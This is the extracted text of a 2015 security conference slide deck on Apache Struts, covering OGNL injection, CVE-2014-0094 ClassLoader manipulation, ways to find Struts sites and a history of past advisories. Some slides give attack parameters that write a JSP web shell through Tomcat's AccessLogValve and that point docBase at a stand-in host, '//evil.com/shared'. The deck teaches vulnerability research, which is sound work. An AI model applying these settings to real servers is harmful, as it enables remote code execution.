Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

RootedCON 2015 - Deep inside the Java framework Apache Struts

4,953 views

Published on

Slides for the talk given at RootedCON 2015 security conference by Julián Vilas (security analyst and researcher).

The goal of the talk was giving a view on the security of the Apache Struts framework.

Published in: Technology
  • Be the first to comment

RootedCON 2015 - Deep inside the Java framework Apache Struts

  1. 1. Deep  inside  the  Java   framework     Apache  Struts       Julián  Vilas  
  2. 2. Whoami   •  Julián  Vilas  (Redsadic)   – @julianvilas   •  Security  Analyst  &  Researcher    
  3. 3. ¿Apache  Struts?   Java  framework   – for  Java  webapps   – Two  major  versions   • Struts  1.x  (EoL  since  2013)   • Struts  2.x  
  4. 4. Why  Struts?   •  (Mar  2014)  CVE-­‐2014-­‐0094  goes  public   •  What  the  hell  was  it?   – Struts  2  vulnerability   – UnauthenVcated   – All  versions  affected   – Could  lead  to  RCE  
  5. 5. CVE-­‐2014-­‐0094   “ParametersInterceptor  allows  access  to  'class'   parameter  which  is  directly  mapped  to  getClass()   method  and  allows  ClassLoader  manipulaVon”     •  Credits:   –  Peter  Magnusson   –  Przemysław  Celej   •  A^er  reading  it…   –  Let’s  go  learning  some  basics  
  6. 6. OGNL   Object  Graph  NavigaVon  Language     •  Expression  Language  for  gedng  and  sedng   properVes  of  Java  objects   – Objects  that  are  stored  in  the  Context    
  7. 7. top   OGNL   #foo.dummy     //  foo.getDummy()     #bar.dummy   //  bar.getDummy()     dummy   //  qux.getDummy()     dummy  =  “RootedCON”   //  qux.setDummy(“RootedCON”)   foo   bar   baz   qux   Context   root   foo   bar   qux   ….   Struts2  OGNL  Context   (AcDonContext)   ValueStack  
  8. 8. Struts  2  request  processing       1 7 Filter     Dispatcher   Interceptors   AcVon   Result   /example/hello.acDon   HTML   1 7 User   2 3 4 56 hMp://struts.example.com/example/hello.acDon   HTML   ParametersInterceptor   Struts2  app  
  9. 9. ParametersInterceptor   “This  interceptor  gets  all  parameters  from   AcVonContext.getParameters()  and  sets  them  on   the  value  stack  by  calling   ValueStack.setValue(String,  Object)”   “Because  parameter  names  are  effecDvely  OGNL   statements,  it  is  important  that  security  be  taken   into  account”   hpp://struts.apache.org/release/2.0.x/struts2-­‐core/apidocs/com/opensymphony/xwork2/interceptor/ ParametersInterceptor.html    
  10. 10. ParametersInterceptor  example   …   HelloWorldAcVon   …   AcDonContext   ValueStack   PUSH   LOOKUP   SETTER   SET  
  11. 11. ParametersInterceptor  example  
  12. 12. Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   ?   AcDonSupport   EXTENDS  
  13. 13. AcVonSupport  methods  
  14. 14. Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   …   getErrors()   getTexts()   getFieldErrors()   getAcDonErrors()   getAcDonMessages()   getErrorMessages()   …   AcDonSupport   EXTENDS  
  15. 15. AcVonSupport  
  16. 16. Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   …   getErrors()   getTexts()   getFieldErrors()   getAcDonErrors()   getAcDonMessages()   getErrorMessages()   …   AcDonSupport   EXTENDS   …   getClass()   …   Object   EXTENDS  
  17. 17. NavigaVng  objects             •  Parameters  are  evaluated  iteraVvely  as  an  AST   chain,  composed  by   – A  chain  of  gepers  (without  parameters)   – Ending  with  a  seper  (1  String,  boolean  or  int   parameter)    
  18. 18. Looking  for  sepers   •  Through  object  navigaVon  reach  several  seper   methods  not  part  of  the  AcVon  can  be  reached   –  What  methods?   •  Post  published  by  neobyte       hpp://sec.baidu.com/index.php?research/detail/id/18     1.  PoC  for  gedng  reachable  sepers   2.  A  method  for  gedng  RCE  on  Tomcat  8    
  19. 19. DEMO   Struts  Tester  on   Tomcat  6  /  7  &  Tomcat  8     customized  &  commented  version  ready  to  use   hpps://github.com/julianvilas/rooted2k15  
  20. 20. Exploitability   Tested  against:     •  Tomcat  6  /  7  à  RCE  via  “docBase”  (win  only)   •  Tomcat  8  à  RCE  via  “AccessLogValve”   •  Glassfish  4  à  RCE  via  “docBase”  (win  only)   •  Websphere  8.5  (developer)  à  RCE  not  found   •  Weblogic  10  &  12  à  RCE  not  found   •  JBOSS  7.1  &  7.4  à  RCE  not  found  
  21. 21. What  about  Struts  1   •  According  to  CVE-­‐2014-­‐0114,  Struts  1  is  also  vulnerable   •  Unpatched!  (struts  1  is  over  EoL,  but  is  sVll  in  use)     •  Different  reason:  Struts  1  no  OGNL  nor  Value  Stack   –  The  key:  bean  populaVon  with  BeanUVls       •  You  can  find  some  Alvaro  Muñoz  (@pwntester)  gold,  like   further  explanaVon  and  a  filter  to  be  applied  as  a   workaround,  at   –  hpp://h30499.www3.hp.com/t5/HP-­‐Security-­‐Research-­‐Blog/Protect-­‐your-­‐ Struts1-­‐applicaVons/ba-­‐p/6463188#.VBMB0i5_s0z   –  hpp://h30499.www3.hp.com/t5/HP-­‐Security-­‐Research-­‐Blog/Update-­‐your-­‐ Struts-­‐1-­‐ClassLoader-­‐manipulaVon-­‐filters/ba-­‐p/6639204#.VOsFG7CG_8Q  
  22. 22. AccessLogValve  exploitaVon             A  log  file  with  name  shell1.jsp  is  created  at  webapps/ROOT.   When  requesVng  a  inexistent  URL,  it’s  logged  into  the  log  file   (that  it’s  going  to  be  interpreted  as  a  JSP  when  get  accessed).   .directory=webapps/ROOT     .prefix=shell   .suffix=.jsp   .fileDateFormat=1   1 2 3 4
  23. 23. DEMO     AccessLogValve  exploitaVon     hpps://github.com/rapid7/metasploit-­‐framework/blob/master/modules/exploits/ mulV/hpp/struts_code_exec_classloader.rb  
  24. 24. docBase  exploitaVon   •  “The  Document  Base  (also  known  as  the  Context   Root)  directory  for  this  web  applicaVon,  or  the   pathname  to  the  web  applicaDon  archive  file  (if  this   web  applicaVon  is  being  executed  directly  from  the   WAR  file).”   •  Legit  applicaVon  goes  down   .docBase=//evil.com/shared    
  25. 25. About  metasploit  module   •  Tomcat  6/7  &  GlassFish  (docBase)     – Only  Win     – Not  landed  yet  in  trunk  but  works  fine   – Maphew  Hall  (0x41414141)  pull  requests:   hpps://github.com/rapid7/metasploit-­‐framework/pull/3074   hpps://github.com/rapid7/metasploit-­‐framework/pull/3075   hpps://github.com/rapid7/metasploit-­‐framework/pull/3323     – Same  module  than  before,  landed  yesterday  night  
  26. 26. DEMO   docBase  exploitaVon    
  27. 27. I  know  Kung-­‐fu                     •  Now  what?  
  28. 28. Searching  Struts  sites   •  Dumb  detecVon  of  Struts  2  sites   – Default  extension  for  Struts  2:  “.acVon”   •  Also,  when  default  configured,  it  accepts  both  “.acVon”   and  no  extension      
  29. 29. Searching  Struts  sites  
  30. 30. Searching  Struts  sites  
  31. 31. Searching  Struts  sites   •  Dumb  detecVon  of  Struts  1  sites     – Default  extension  for  Struts  1:  “.do”    
  32. 32. Searching  Struts  sites   hpps://web.archive.org/web/20060519001958/hpp://simonpeter.com/technology/ java/struts/sites.html  
  33. 33. Vulnerability  checking   •  To  check  if  a  Struts  2  site  is  vulnerable,  modify   “cacheMaxSize”  property   –  Integer.MAX_VALUE  ==  2147483647  (in  x86)             •  Tomcat  6/7  &  Glassfish   •  Tomcat  8       2147483647   2147483648   AAAAAAAAA  
  34. 34. Vulnerability  checking   •  In  Struts  1  if  the  conversion  String  to  Integer   fails  a  default  value  0  is  set   •  But  when  trying  to  set  a  method  that  receives   an  Object  with  a  String,  a  excepVon  is  raised       ROOTEDCON  
  35. 35. OK  I  see,  but…        
  36. 36. Previous  security  bulleVns         RCE,  when  form  validaDon  fails  field  values   are  interpreted  as  OGNL     RCE,  bypass  the  '#'-­‐usage  protecDon  built   into  the  ParametersInterceptor  to  execute   OGNL   RCE,  bypass  the  '#'-­‐usage  protecDon  built   into  the  ParametersInterceptor  to  execute   OGNL  !  S2-­‐003  fix  was  incomplete   RCE,  user’s  input  is  evaluated  as  OGNL  when   there’s  a  conversion  error   Several  RCE:  via  ExcepDonDelegator  (same   as  S2-­‐007),  CookieInterceptor  (same  idea   than  S2-­‐003  and  S2-­‐005),  etc.   RCE,  incomplete  fix  for  S2-­‐003  and  S2-­‐005  on   ParametersInterceptor    
  37. 37. Previous  security  bulleVns         RCE,  incomplete  fix  for  S2-­‐003,  S2-­‐005  and   S2-­‐009  on  ParametersInterceptor  when   using  values  for  redirecDons   RCE,  s:url  and  s:a  tags,  when   "includeParams"  is  set,  allow  evaluaDng  the   values  of  request  parameters  as  OGNL.   RCE,  same  than  S2-­‐013,  incomplete  fix.   RCE,  acDons  using  wildcards  and  Double   OGNL  evaluaDon  allow  OGNL  injecDon   RCE:  DefaultAcDonMapper  short-­‐circuit   navigaDon  interpreted  as  OGNL   RCE,  what  we  saw  in  this  presentaDon  ☺   (ParametersInterceptor)     RCE,  Incomplete  fix  for  S2-­‐020   Incomplete  fix  for  S2-­‐020  and  S2-­‐021  
  38. 38. Previous  security  bulleVns        
  39. 39. Conclusions?   •  Seven  years  from  between  S2-­‐001  and  S2-­‐020   •  Same  kind  of  vulnerabiliVes:  injecDng  OGNL   from  user-­‐supplied  data     •  Several  bypasses  for  fixes   •  Almost  all  RCE       •  Take  your  own…  
  40. 40. Bonus  track  -­‐  Confluence   •  Is  based  on  a  WebWork  fork  (previous  than  Struts  2)   •  If  you  look  their  bulleVns   –  Versions  up  to  and  including  5.5.1  vulnerable  to   ClassLoader  manipulaDon   hpps://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory +2014-­‐05-­‐21     –  Versions  up  to  5.6  (before  5.6.6  and  5.5.7)  are  vulnerable   to  double  OGNL  evaluaDon   hpps://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-­‐ +2015-­‐01-­‐21   •  Don’t  they  look  familiar?  J  
  41. 41. Bonus  track  -­‐  Confluence  
  42. 42. QuesVons?   •  You  can  ask  also  :   – Poke  me  around   – by  twiper:  @julianvilas        
  43. 43. QuesVons?   •  And  what  do  you  think  about  OGNL?     Thanks  for  aMending!!!  ☺  

×